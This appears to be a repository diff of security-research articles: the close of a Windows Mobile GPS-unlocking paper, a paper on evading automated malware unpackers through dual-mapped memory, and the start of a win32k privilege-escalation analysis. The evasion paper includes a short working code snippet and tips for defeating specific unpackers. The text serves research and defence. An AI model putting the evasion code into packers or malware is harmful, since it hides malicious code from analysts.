Unfortunately, import table hooking is a significantly more complicated affair
|
||||
on Windows Mobile-based platforms than on standard Windows. The image headers
|
||||
for a loaded image are discarded after the image has been mapped, and the IAT
|
||||
itself is often relocated to be non-contiguous with the rest of the image.
|
||||
|
||||
This relocation is possible as there appears to be an implicit restriction
|
||||
that all references to an IAT address on ARM PE images must indirect through a
|
||||
global variable that contains the absolute address of the desired IAT address.
|
||||
As a result, there are no relative references to the IAT, and thus absolute
|
||||
address references may be fixed up via the aid of relocation information. It
|
||||
is not clear to the author what purpose this relocation of the IAT
|
||||
outside the normal image confines serves on Windows Mobile for non-XIP modules
|
||||
that are loaded into device RAM.
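
The indirection described above can be modeled in portable C. This is only a
sketch of the idea, not the Windows Mobile loader: the names real_api,
hook_api, image_iat, relocated_iat, iat_slot_ptr, call_import and
relocate_iat are all hypothetical. It shows why moving the IAT only requires
fixing up one global pointer, and why patching the in-image table has no
effect once the table has been moved.

```c
/* Hypothetical imported API and a stand-in hook; both are illustrative. */
typedef int (*api_fn)(int);

static int real_api(int x) { return x + 1; }
static int hook_api(int x) { return x + 100; }

/* Models the IAT as laid out inside the image. */
static api_fn image_iat[1] = { real_api };

/* Models an IAT copy placed outside the image by the loader. */
static api_fn relocated_iat[1];

/* The single global that holds the absolute address of the IAT slot.
   Code never names the slot directly, only this pointer. */
static api_fn *iat_slot_ptr = &image_iat[0];

/* Every call site performs the same double indirection. */
static int call_import(int x)
{
    return (*iat_slot_ptr)(x);
}

/* Moving the IAT only requires fixing up the one global pointer. */
static void relocate_iat(void)
{
    relocated_iat[0] = image_iat[0];
    iat_slot_ptr = &relocated_iat[0];
}
```

After relocate_iat() runs, storing hook_api into image_iat[0] changes nothing
for callers; a hook only takes effect when it is written to relocated_iat[0],
which is the table a hooking tool would first have to locate.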
|
||||
|
||||
Furthermore, the HMODULE of an image does not equate to its load base address
|
||||
on Windows Mobile. One can retrieve the real load base address of a module on
|
||||
Windows Mobile via the GetModuleInformation API. This is a significant
|
||||
departure from standard Windows.
|
||||
|
||||
Due to these limitations, the author elected not to pursue IAT hooking for the
|
||||
purposes of the GPS unlocking project. Although there is code publicly
|
||||
available to cope with the relocation of an image's IAT, it appears to be
|
||||
dependent on kernel data structures for which the author did not have a
|
||||
conveniently available and accurate definition corresponding to the
|
||||
Windows Mobile kernel shipping on the xv6800.
|
||||
|
||||
7. Conclusion
|
||||
|
||||
Locking down the gpsOne hardware on the xv6800 such that it can only be
|
||||
utilized by Verizon Wireless certified and approved applications can be seen in
|
||||
two lights. One could consider such actions an anti-competitive move, designed
|
||||
to lock out third party programs from having the opportunity to compete with
|
||||
VZ Navigator. However, such reasoning is fairly questionable, given that
|
||||
other carriers in the United States (particularly GSM-based carriers) typically
|
||||
fully support third party GPS-enabled applications on their devices. As
|
||||
consumers expect more full-featured and advanced devices, locking down devices
|
||||
to only carrier-approved functionality is becoming an increasingly large
|
||||
competitive liability for companies seeking to differentiate their networks
|
||||
and devices in today's saturated mobile phone markets.
|
||||
|
||||
Furthermore, Verizon Wireless's currently shipping location-enabled application
|
||||
for the xv6800, VZ Navigator, remains competitive (by virtue of features such
|
||||
as turn-by-turn voice navigation, traffic awareness, and automatic re-routing)
|
||||
even if the built-in GPS hardware on the xv6800 were to be unlocked for
|
||||
general-purpose use. Freely available navigation programs lack these features,
|
||||
and commercial applications are based off of a different pricing model than the
|
||||
periodic monthly fee model used by VZ Navigator at the time of this article's
|
||||
writing.
|
||||
|
||||
A more reasonable (although perhaps misguided) rationale for locking down the
|
||||
gpsOne hardware is to protect users from having their location harvested or
|
||||
tracked by malicious programs. Unfortunately, the relatively open nature of
|
||||
Windows Mobile 6, and a lack of particularly effective privilege-level
|
||||
isolation on Windows Mobile 6 after any unsigned code is permitted to run both
|
||||
conspire to greatly diminish the effectiveness of the protection schemes that
|
||||
are implemented on the xv6800.
|
||||
|
||||
Whether this is a legitimate concern or not remains, of course, up for debate,
|
||||
but it is clear that the lockdown system as present on the xv6800 is not
|
||||
particularly effective at blocking access by unapproved third-party
|
||||
applications.
|
||||
|
||||
Future releases of Windows Mobile claim support for a much more effective
|
||||
privilege isolation model that may provide true security from unprivileged,
|
||||
malicious programs. However, in currently shipping devices, the operating
|
||||
system cannot be relied upon to provide this protection. Relying on security
|
||||
through obscurity to implement lockdown and protection schemes may then seem
|
||||
attractive, but such mechanisms rarely provide true security.
|
||||
|
||||
As mobile phones become more and more powerful devices, in effect
|
||||
becoming small general-purpose computers, privacy and security concerns begin
|
||||
to gain greater relevance. With the capability to record a user's location
|
||||
and audio and environment (via built-in microphones and cameras present on
|
||||
virtually all modern-day phones), there arises the chance for serious privacy
|
||||
breaches, especially given that modern-day smartphones have historically not seen
|
||||
the more vigorous level of security review that is slowly becoming more
|
||||
commonplace on general-purpose computers.
|
||||
|
||||
One simple and elegant potential solution to these privacy risks is to simply
|
||||
provide hardware switches to disable sensitive components, such as cameras or
|
||||
embedded GPS hardware. In keeping with this philosophy, the author would
|
||||
encourage Verizon Wireless to fully open up their devices, and defer to simple
|
||||
and secure methods to allow users to manage their sensitive information, such
|
||||
as physical hardware switches.
|
||||
|
||||
|
||||
Bibliography:
|
||||
|
||||
[1] Verizon Wireless. Commercial Location Based Services.
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008
|
||||
|
||||
[2] Verizon Wireless. LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?").
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008
|
||||
|
||||
[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA.
|
||||
http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008
|
||||
|
||||
[4] Microsoft. GPS Intermediate Driver Reference.
|
||||
http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008
|
||||
|
||||
[5] Microsoft. GPSOpenDevice.
|
||||
http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008
|
||||
|
||||
[6] Microsoft. GPSGetPosition.
|
||||
http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008
|
||||
|
||||
[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?").
|
||||
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008
|
||||
|
||||
[8] Microsoft. GetModuleFileName Function (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008
|
||||
|
||||
[9] Microsoft. CryptImportKey Function (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008
|
||||
|
||||
[10] Microsoft. Example C program: Importing a Plaintext Key (Windows).
|
||||
http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008
|
||||
|
231
uninformed/10.2.txt
Normal file
|
@ -0,0 +1,231 @@
|
|||
Using dual-mappings to evade automated unpackers
|
||||
10/2008
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs
|
||||
attempt to dynamically unpack executables by detecting the execution of code
|
||||
from regions of virtual memory that have been written to. While this is an
|
||||
elegant method of detecting dynamic code execution, it is possible to evade
|
||||
these unpackers by dual-mapping physical pages to two distinct virtual address
|
||||
regions where one region is used as an editable mapping and the second region
|
||||
is used as an executable mapping. In this way, the editable mapping is
|
||||
written to during the unpacking process and the executable mapping is used to
|
||||
execute the unpacked code dynamically. This effectively evades automated
|
||||
unpackers which rely on detecting the execution of code from virtual addresses
|
||||
that have been written to.
|
||||
|
||||
Update: After publishing this article it was pointed out that the design of
|
||||
the Justin dynamic unpacking system should invalidate evasion techniques that
|
||||
assume that the unpacking system will only trap on the first execution attempt
|
||||
of a page that has been written to. Justin counters this evasion technique
|
||||
implicitly by enforcing W ^ X such that when a page is executed from for the
|
||||
first time, it is marked as executable but non-writable. Subsequent write
|
||||
attempts will cause the page to be marked as non-executable and dirty. This
|
||||
logic is enforced across all virtual addresses that are mapped to the same
|
||||
physical pages. This has the potential to be an effective countermeasure,
|
||||
although there are a number of implementation complexities that may make it
|
||||
difficult to realize in a robust fashion, such as those related to the
|
||||
duplication of handles and the potential for race conditions when
|
||||
transitioning page protections.
|
||||
|
||||
1. Background
|
||||
|
||||
There are a number of automated unpackers that rely on detecting the execution
|
||||
of dynamic code from virtual addresses that have been written to. This section
|
||||
provides some background on the approaches taken by these unpackers.
|
||||
|
||||
1.1 Malware Normalization
|
||||
|
||||
Christodorescu et al. described a method of normalizing programs which focuses
|
||||
on eliminating obfuscation[2]. One of the components of this normalization
|
||||
process consists of an iterative algorithm that is meant to produce a program
|
||||
that is not self-generating. In essence, this algorithm relies on detecting
|
||||
dynamic code execution to identify self-generated code. To support this
|
||||
algorithm, QEMU was used to monitor the execution flow of the input program as
|
||||
well as all memory writes that occur. If execution is transferred to an
|
||||
address that has been written to, it is known that dynamic code is being
|
||||
executed.
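
The write-then-execute check described above can be sketched in a few lines
of C. This is a toy model, not the implementation from the cited work: it
assumes page granularity and a small tracked address range, and the names
tracker_reset, tracker_on_write and tracker_on_execute are hypothetical
hooks that an emulator would call for each memory write and each control
transfer.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SHIFT    12u    /* assumed 4 KiB pages */
#define TRACKED_PAGES 1024u  /* toy address space of 4 MiB */

/* One flag per virtual page: has anything been written here? */
static bool page_written[TRACKED_PAGES];

static void tracker_reset(void)
{
    memset(page_written, 0, sizeof page_written);
}

/* Called by the (hypothetical) emulator for every memory write. */
static void tracker_on_write(uint32_t vaddr)
{
    uint32_t page = vaddr >> PAGE_SHIFT;
    if (page < TRACKED_PAGES)
        page_written[page] = true;
}

/* Called for every control transfer; returns true when the target lies
   in a page that was written to, i.e. when dynamic code is suspected. */
static bool tracker_on_execute(uint32_t vaddr)
{
    uint32_t page = vaddr >> PAGE_SHIFT;
    return page < TRACKED_PAGES && page_written[page];
}
```

Note that the flags are indexed purely by virtual address. That detail is
the assumption the remainder of this article examines.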
|
||||
|
||||
1.2 Renovo
|
||||
|
||||
Renovo is similar to the malware normalization technique in that it uses an
|
||||
emulated environment to monitor program execution and memory writes to detect
|
||||
when dynamic code is executed[3]. Renovo makes use of TEMU as the execution
|
||||
environment for a given program. When Renovo detects the execution of code
|
||||
from memory that was written to in the context of a given process, it extracts
|
||||
the dynamic code and attempts to find the original entry point of the unpacked
|
||||
executable.
|
||||
|
||||
1.3 Saffron
|
||||
|
||||
Saffron uses two approaches to dynamically unpack executables[5]. The first
|
||||
approach involves using Pin's dynamic instrumentation facilities to monitor
|
||||
program execution and memory writes in a manner similar to the emulated
|
||||
approaches described previously. The second approach makes use of hardware
|
||||
paging features to detect when execution is transferred to a memory region.
|
||||
Saffron detects the first time code is executed from a page, regardless of
|
||||
whether or not it is writable, and logs information about the execution to
|
||||
support extracting the unpacked executable. This can be seen as a more
|
||||
generic version of the technique used by OllyBonE which focused on using
|
||||
paging features to monitor a specific subset of the address space[8].
|
||||
OmniUnpack also uses an approach that is similar to Saffron[4].
|
||||
|
||||
1.4 Pandora's Bochs
|
||||
|
||||
Pandora's Bochs uses techniques similar to those used by Christodorescu and
|
||||
Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment
|
||||
in which to monitor program execution and memory writes to detect when dynamic
|
||||
code is executed.
|
||||
|
||||
1.5 Justin
|
||||
|
||||
Justin is a recently developed dynamic unpacking system that was presented at
|
||||
RAID 2008 after the completion of the initial draft of this paper[9]. Justin
|
||||
differs from previous work in that it uses hardware non-executable paging
|
||||
support to enforce W ^ X on virtual address regions. When an execution
|
||||
attempt occurs, an exception is generated and Justin determines whether or not
|
||||
the page being executed from was written to previously. The authors of Justin
|
||||
correctly identified the evasion technique described in the following section
|
||||
and have attempted to design their system to counter it. Their approach
|
||||
involves verifying that the protection attributes are the same across all
|
||||
virtual addresses that map to the same physical pages. This should be an
|
||||
effective countermeasure, although there is certainly room for attacking
|
||||
implementation weaknesses, should any exist.
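
A rough model of the W ^ X bookkeeping described for Justin is given below.
It is a sketch under stated assumptions, not Justin's code: state is kept
per physical frame so that every virtual alias shares it, and the names
frame_state, wx_reset, wx_on_write and wx_on_execute are hypothetical.

```c
#include <stdbool.h>

#define FRAME_COUNT 8  /* toy number of physical frames */

/* Protection state shared by every virtual alias of a physical frame. */
typedef struct {
    bool writable;
    bool executable;
    bool dirty;       /* written to since it was last executed */
} frame_state;

static frame_state frames[FRAME_COUNT];

static void wx_reset(void)
{
    for (int i = 0; i < FRAME_COUNT; i++) {
        frames[i].writable = true;
        frames[i].executable = false;
        frames[i].dirty = false;
    }
}

/* A write makes the frame non-executable and marks it dirty. */
static void wx_on_write(int frame)
{
    frames[frame].writable = true;
    frames[frame].executable = false;
    frames[frame].dirty = true;
}

/* An execution attempt makes the frame executable but non-writable.
   Returns true if the frame was dirty, i.e. freshly written code is
   about to run and the unpacker should take a closer look. */
static bool wx_on_execute(int frame)
{
    bool was_dirty = frames[frame].dirty;
    frames[frame].writable = false;
    frames[frame].executable = true;
    frames[frame].dirty = false;
    return was_dirty;
}
```

Because a write after the first execution sets the dirty flag again, the
next execution attempt from any alias of the same frame is reported.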
|
||||
|
||||
2. Dual-mapping
|
||||
|
||||
The automated unpackers described previously rely on their ability to detect
|
||||
the execution of dynamic code from virtual addresses that have been written
|
||||
to. This implicitly assumes that the virtual address used to execute code
|
||||
will be equal to an address that was written to previously. While this
|
||||
assumption is safe in most circumstances, it is possible to use features
|
||||
provided by the Windows memory manager to evade this form of detection.
|
||||
|
||||
The basic idea behind this evasion technique involves dual-mapping a set of
|
||||
physical pages to two virtual address regions. The first region is considered
|
||||
an editable mapping and the second region is considered an executable mapping.
|
||||
The contents of the unpacked executable are written to the editable mapping
|
||||
and later executed using the executable mapping. Since both mappings are
|
||||
associated with the same physical pages, the act of writing to the editable
|
||||
mapping indirectly alters the contents of the executable mapping. This evades
|
||||
detection by making it appear that the code that is executed from the
|
||||
executable mapping was never actually written to. This technique is
|
||||
preferable to writing the unpacked executable to disk and then mapping it into
|
||||
memory as doing so would enable trivial unpacking and detection.
|
||||
|
||||
Implementing this evasion technique on Windows can be accomplished using fully
|
||||
supported user-mode APIs. First, a pagefile-backed section (anonymous memory
|
||||
mapping) must be created using the CreateFileMapping API. The handle returned
|
||||
from this function must then be passed to MapViewOfFile to create both the
|
||||
editable and executable mappings. Finally, the dynamic code must be unpacked
|
||||
into the editable mapping through whatever means and then executed using the
|
||||
executable mapping. This is illustrated in the code below:
|
||||
|
||||
ImageMapping = CreateFileMapping(
|
||||
INVALID_HANDLE_VALUE, NULL,
|
||||
PAGE_EXECUTE_READWRITE | SEC_COMMIT,
|
||||
0, CodeLength, NULL);
|
||||
|
||||
EditableBaseAddress = MapViewOfFile(ImageMapping,
|
||||
FILE_MAP_READ | FILE_MAP_WRITE,
|
||||
0, 0, 0);
|
||||
ExecutableBaseAddress = MapViewOfFile(ImageMapping,
|
||||
FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE,
|
||||
0, 0, 0);
|
||||
|
||||
CopyMemory(EditableBaseAddress,
|
||||
CodeBuffer, CodeLength);
|
||||
|
||||
((VOID (*)())ExecutableBaseAddress)();
|
||||
|
||||
The example code provides an illustration of using this technique to execute
|
||||
dynamic code. This technique should also be fairly easy to adapt to the
|
||||
unpacking code used by existing packers. One consideration that must be made
|
||||
when using this technique is that relocations must be applied to the unpacked
|
||||
executable relative to the base address of the executable mapping. With that
|
||||
said, the relocation fixups themselves must be applied to the editable mapping
|
||||
in order to avoid tainting the executable mapping.
|
||||
|
||||
An additional evasion technique may also be necessary for certain dynamic
|
||||
unpackers that monitor code execution from any virtual address, regardless of
|
||||
whether or not it was previously written to. This is the case with Saffron's
|
||||
paging-based automated unpacker[5]. For performance reasons, Saffron only logs
|
||||
information the first time code is executed from a page. If the contents of
|
||||
the code changes after this point, Saffron will not be aware of them. This
|
||||
makes it possible to evade this form of unpacking by executing innocuous code
|
||||
from each page of the executable mapping. Once this has finished, the actual
|
||||
unpacked executable can be extracted into the editable mapping and then
|
||||
executed normally. This evasion technique should also be effective against
|
||||
Justin due to the fact that Justin does not trap on subsequent execution
|
||||
attempts from a given virtual address[9].
|
||||
|
||||
While these evasion techniques are expected to be effective, they have not
|
||||
been experimentally verified. There are a number of reasons for this. No
|
||||
public version of Pandora's Bochs is currently available. However, its author
|
||||
has indicated that this technique should be effective. Renovo provides a web
|
||||
interface that can be used to analyze and unpack executables. No data was
|
||||
received after uploading an executable that simulated this evasion technique.
|
||||
The authors of Saffron have indicated that they expected this technique to be
|
||||
effective.
|
||||
|
||||
3. Weaknesses
|
||||
|
||||
Perhaps the most significant weakness of the dual-mapping technique is that it
|
||||
is not capable of evading all automated unpackers. For example, dynamic
|
||||
unpacking techniques that strictly focus on control flow transfers, such as
|
||||
PolyUnpack[7] and ParaDyn[6], should still be effective. However, this
|
||||
weakness could be overcome by incorporating additional evasion techniques,
|
||||
such as those mentioned in cited work[7].
|
||||
|
||||
Automated unpackers could also attempt to invalidate the dual-mapping
|
||||
technique by monitoring writes and code execution in terms of physical
|
||||
addresses rather than virtual addresses. This would be effective due to the
|
||||
fact that both the editable and executable virtual mappings would refer to
|
||||
the same physical addresses. However, this approach would likely require a
|
||||
better understanding of operating system semantics since memory may be paged
|
||||
in and out at any time.
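
The difference between the two tracking strategies can be illustrated with a
toy page table in C. This is a simplified model under stated assumptions: a
fixed virtual-page-to-frame table that never changes due to paging, and
hypothetical helper names (mm_reset, mm_map, mm_write, exec_flagged_virtual,
exec_flagged_physical). It is not taken from any of the unpackers discussed.

```c
#include <stdbool.h>
#include <string.h>

#define VPAGES   16    /* toy number of virtual pages  */
#define PFRAMES  8     /* toy number of physical frames */
#define UNMAPPED (-1)

static int  page_table[VPAGES];    /* virtual page -> physical frame */
static bool virt_written[VPAGES];  /* tracker keyed on virtual pages */
static bool phys_written[PFRAMES]; /* tracker keyed on physical frames */

static void mm_reset(void)
{
    for (int i = 0; i < VPAGES; i++)
        page_table[i] = UNMAPPED;
    memset(virt_written, 0, sizeof virt_written);
    memset(phys_written, 0, sizeof phys_written);
}

static void mm_map(int vpage, int frame)
{
    page_table[vpage] = frame;
}

/* Record a write in both trackers. */
static void mm_write(int vpage)
{
    virt_written[vpage] = true;
    if (page_table[vpage] != UNMAPPED)
        phys_written[page_table[vpage]] = true;
}

/* Virtual-address tracking: only sees writes made through this page. */
static bool exec_flagged_virtual(int vpage)
{
    return virt_written[vpage];
}

/* Physical tracking: sees writes made through any alias of the frame. */
static bool exec_flagged_physical(int vpage)
{
    int frame = page_table[vpage];
    return frame != UNMAPPED && phys_written[frame];
}
```

With virtual pages 2 and 9 both mapped to frame 5, a write through page 2
followed by execution from page 9 is missed by the virtual tracker but
flagged by the physical one.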
|
||||
|
||||
4. Conclusion
|
||||
|
||||
The dual-mapping technique can be used by packers to evade automated unpacking
|
||||
tools that rely on detecting dynamic code execution from virtual addresses
|
||||
that have been written to. While this evasion technique is expected to be
|
||||
effective in its current form, it should be possible for automated unpackers
|
||||
to adapt to handle this scenario such as by monitoring writes to physical
|
||||
pages or by better understanding operating system semantics that deal with
|
||||
virtual memory mappings.
|
||||
|
||||
References
|
||||
|
||||
[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware.
|
||||
http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008.
|
||||
|
||||
[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser,
|
||||
and Helmut Veith. Malware normalization. Technical Report 1539, University
|
||||
of Wisconsin, Madison, Wisconsin, USA, November 2005.
|
||||
|
||||
[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor
|
||||
for packed executables.
|
||||
http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007.
|
||||
|
||||
[4] L. Martignoni, M. Christodorescu, and S. Jha. Omniunpack: Fast, generic,
|
||||
and safe unpacking of malware.
|
||||
http://www.acsac.org/2007/papers/151.pdf, December 2007.
|
||||
|
||||
[5] Danny Quist and Valsmith. Covert debugging: Circumventing software
|
||||
armoring techniques. BlackHat USA, Aug 2007.
|
||||
|
||||
[6] K. Roundy. Analysis and instrumentation of packed binary code.
|
||||
http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt,
|
||||
Apr 2008.
|
||||
|
||||
[7] P. Royal, M. Halpin, D. Dagon, R. Edmonds, and W. Lee. Polyunpack:
|
||||
Automating the hidden-code extraction of unpack-executing malware. 22nd
|
||||
Annual Computer Security Applications Conference, Dec 2006.
|
||||
|
||||
[8] J. Stewart. Ollybone. 2006.
|
||||
|
||||
[9] Fanglu Guo, Peter Ferrie, and Tzi-cker Chiueh. A study
|
||||
of the packer problem and its solutions. In RAID, pages
|
||||
98-115, 2008.
|
867
uninformed/10.3.txt
Normal file
|
@ -0,0 +1,867 @@
|
|||
Analyzing local privilege escalations in win32k
|
||||
10/2008
|
||||
mxatone
|
||||
mxatone@gmail.com
|
||||
|
||||
Abstract: This paper analyzes three vulnerabilities that were found in
|
||||
win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a
|
||||
major component of the GUI subsystem in the Windows operating system. These
|
||||
vulnerabilities have been reported by the author and patched in MS08-025[1]. The
|
||||
first vulnerability is a kernel pool overflow with an old communication
|
||||
mechanism called the Dynamic Data Exchange (DDE) protocol. The second
|
||||
vulnerability involves improper use of the ProbeForWrite function within
|
||||
string management functions. The third vulnerability concerns how win32k
|
||||
handles system menu functions. Their discovery and exploitation are covered.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The design of modern operating systems provides a separation of privileges
|
||||
between processes. This design restricts a non-privileged user from directly
|
||||
affecting processes they do not have access to. This enforcement relies on
|
||||
both hardware and software features. The hardware features protect devices
|
||||
against unknown operations. A secure environment provides only necessary
|
||||
rights by filtering program interaction within the overall system. This
|
||||
control increases the number of provided interfaces and, in turn, the security risks. Abusing
|
||||
operating system design or implementation flaws in order to elevate a
|
||||
program's rights is called a privilege escalation.
|
||||
|
||||
During the past few years, userland code and its protections have improved.
|
||||
Better understanding of operating system internals has made abnormal behaviour
|
||||
detection easier. The exploitation of classical weaknesses is harder than it
|
||||
was. Nowadays, local exploitation directly targets the kernel. Kernel local
|
||||
privilege escalation brings up new exploitation methods and most of them are
|
||||
certainly still undiscovered. Even if the Windows kernel is highly protected
|
||||
against known attack vectors, the operating system itself has a lot of
|
||||
different drivers that contribute to its overall attack surface.
|
||||
|
||||
On Windows, the graphical user interface (GUI) is divided into both
|
||||
kernel-mode and user-mode components. The win32k.sys driver handles user-mode
|
||||
requests for graphic rendering and window management. It also redirects
|
||||
DirectX calls on to the appropriate driver. For local privilege escalation,
|
||||
win32k represents an interesting target as it exists on all versions of
|
||||
Windows and some features have existed for years without modifications.
|
||||
|
||||
This article presents the author's work on analyzing the win32k driver to find
|
||||
and report vulnerabilities that were addressed in Microsoft bulletin
|
||||
MS08-025[1]. Even if the patch adds an overall protection layer, it concerns
|
||||
three reported vulnerabilities on different parts of the driver. The Windows
|
||||
graphics stack is very complex and this article will focus on describing some
|
||||
of win32k's organization and functionalities. Any reader who is interested in
|
||||
this topic is encouraged to look at MSDN documentation for additional
|
||||
information.
|
||||
|
||||
The structure of this paper is as follows. In chapter 2, the win32k driver
|
||||
architecture basics will be presented with a focus on vulnerable contexts.
|
||||
The following chapter will detail how each of the three vulnerabilities was
|
||||
discovered and exploited. Finally, a later chapter will discuss possible security improvements for
|
||||
the vulnerable driver.
|
||||
|
||||
2) Win32k design
|
||||
|
||||
Windows is based on a graphical user interface and cannot work without it. Only
|
||||
Windows Server 2008 in server core mode uses a minimalist user interface, but it
|
||||
shares the exact same components as typical user interfaces. The win32k driver
|
||||
is a critical component in the graphics stack exporting more than 600 functions.
|
||||
It extends the System Service Descriptor Table (SSDT) with another
|
||||
table called W32pServiceTable. This driver is not as big as the
|
||||
main kernel module (ntoskrnl.exe) but its interaction with the
|
||||
user-mode is just as important. The service table for win32k contains fewer than
|
||||
300 functions depending on the version of Windows. The win32k driver commonly
|
||||
transfers control to user-mode with a user-mode callback system that will be
|
||||
explained in this part. The interface between user-mode modules and
|
||||
kernel-mode drivers has been built in order to facilitate window creation and
|
||||
management. This is a critical feature of Windows which may explain why
|
||||
exactly the same functions can be seen across multiple operating system
|
||||
versions.
|
||||
|
||||
2.1) General security implementation
|
||||
|
||||
The most important part of a driver in terms of security is how it validates
|
||||
user-mode inputs. Each argument passed as a pointer must be a valid user-mode
|
||||
address and be unchangeable to avoid race conditions. This validation is often
|
||||
accomplished by comparing a provided address with an address near the base of
|
||||
kernel memory using functions such as ProbeForRead and ProbeForWrite. Input
|
||||
contained within pointers is also typically cached in local variables
|
||||
(capturing). The Windows kernel design is very strict on this part. When you
|
||||
look deeper into win32k's functions, you will see that they do not follow the
|
||||
same strict integrity verifications made by the kernel. For example, consider
|
||||
the following check made by the Windows kernel (translated to C):
|
||||
|
||||
NTSTATUS NTAPI NtQueryInformationPort(
|
||||
HANDLE PortHandle,
|
||||
PORT_INFORMATION_CLASS PortInformationClass,
|
||||
PVOID PortInformation,
|
||||
ULONG PortInformationLength,
|
||||
PULONG ReturnLength
|
||||
)
|
||||
|
||||
[...] // Prepare local variables
|
||||
|
||||
if (AccessMode != KernelMode)
|
||||
{
|
||||
try {
|
||||
// Check submitted address - if incorrect, raise an exception
|
||||
ProbeForWrite( PortInformation, PortInformationLength, 4);
|
||||
|
||||
if (ReturnLength != NULL)
|
||||
{
|
||||
if (ReturnLength > MmUserProbeAddress)
|
||||
*MmUserProbeAddress = 0; // raise exception
|
||||
|
||||
*ReturnLength = 0;
|
||||
}
|
||||
|
||||
} except(1) { // Catch exceptions
|
||||
return exception_code;
|
||||
}
|
||||
}
|
||||
|
||||
[...] // Perform actions
|
||||
|
||||
We can see that the arguments are tested in a very simple way before doing
|
||||
anything else. The ReturnLength field implements its own verification which
|
||||
relies directly on MmUserProbeAddress. This variable marks the separation
|
||||
between user-mode and kernel-mode address spaces. In case of an invalid
|
||||
address, an exception is raised by writing to this variable, which is
|
||||
read-only. The ProbeForRead and ProbeForWrite verification routines likewise
|
||||
raise an exception if an incorrect address is encountered. However, the win32k
|
||||
driver does not always follow this pattern:
|
||||
|
||||
BOOL NtUserSystemParametersInfo(
|
||||
UINT uiAction,
|
||||
UINT uiParam,
|
||||
PVOID pvParam,
|
||||
UINT fWinIni)
|
||||
|
||||
[...] // Prepare local variables
|
||||
|
||||
switch(uiAction)
|
||||
{
|
||||
case SPI_1:
|
||||
// Custom checks
|
||||
break;
|
||||
case SPI_2:
|
||||
size = sizeof(Struct2);
|
||||
goto prob_read;
|
||||
case SPI_3:
|
||||
size = sizeof(Struct3);
|
||||
goto prob_read;
|
||||
case SPI_4:
|
||||
size = sizeof(Struct4);
|
||||
goto prob_read;
|
||||
case SPI_5:
|
||||
size = sizeof(Struct5);
|
||||
goto prob_read;
|
||||
case SPI_6:
|
||||
size = sizeof(Struct6);
|
||||
|
||||
prob_read:
|
||||
ProbeForRead(pvParam, size, 4)
|
||||
|
||||
[...]
|
||||
}
|
||||
|
||||
[...] // Perform actions
|
||||
|
||||
This function is very complex and this example presents only a small part of
|
||||
the checks. Some parameters need only classic verification while others
|
||||
implement their own. This elaborate code can create confusion which improves
|
||||
the chances of a local privilege escalation. The issues comes from unordinary
|
||||
kernel function that handles multiple features at the same time without
|
||||
implementing a standardized function prototype. The Windows kernel solved this
|
||||
issue on NtSet* and NtQuery* functions by using two simple arguments. The
|
||||
first argument is a classical buffer and the second argument is its size. For
|
||||
example, the NtQueryInformationPort function will check the buffer in a
|
||||
generic way and then only verify that the size correspond to the specified
|
||||
feature. The win32k design implementation ameliorates GUI development but make
|
||||
code review very difficult.
|
||||
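The "buffer plus size" convention described above can be sketched as a single
table-driven check. This is only an illustration in portable C: the
information classes, their sizes, the boundary constant and the function
names are assumptions made for the example and are not taken from the
Windows kernel.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical information classes and their fixed payload sizes. */
typedef enum { INFO_BASIC = 0, INFO_EXTENDED = 1, INFO_CLASS_COUNT } info_class_t;

static const size_t k_expected_size[INFO_CLASS_COUNT] = {
    [INFO_BASIC]    = 8,
    [INFO_EXTENDED] = 24,
};

/* Stand-in for the user/kernel boundary (MmUserProbeAddress in the text). */
#define USER_PROBE_ADDRESS ((uintptr_t)0x7FFF0000u)

/* Generic check: [address, address + length) must lie below the boundary. */
static bool range_is_user(uintptr_t address, size_t length)
{
    if (length == 0) return false;              /* this sketch refuses empty buffers */
    if (address >= USER_PROBE_ADDRESS) return false;
    return length <= USER_PROBE_ADDRESS - address;
}

/* One validation path for every class: size lookup, then the generic check. */
static bool validate_query(info_class_t cls, uintptr_t buffer, size_t length)
{
    if ((unsigned)cls >= (unsigned)INFO_CLASS_COUNT) return false;
    assert(k_expected_size[cls] != 0);          /* the table must cover every class */
    if (length != k_expected_size[cls]) return false;
    return range_is_user(buffer, length);
}
```

With this shape, adding a feature means adding one table row, and a reviewer
only has to audit a single validation routine.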
|
||||
2.2) KeUserModeCallback utilization

Typical interaction between user-mode and kernel-mode is done via syscalls. A
user-mode module may request that the kernel execute an action and return the
needed information. The win32k driver has a callback system to do the exact
opposite. The KeUserModeCallback function calls a user-mode function from
kernel-mode. This function is undocumented and is provided by the kernel
module as a secure way to switch into user-mode properly. The win32k driver
uses this functionality for common tasks such as loading a DLL module for
event catching or retrieving information. The prototype of this function is:

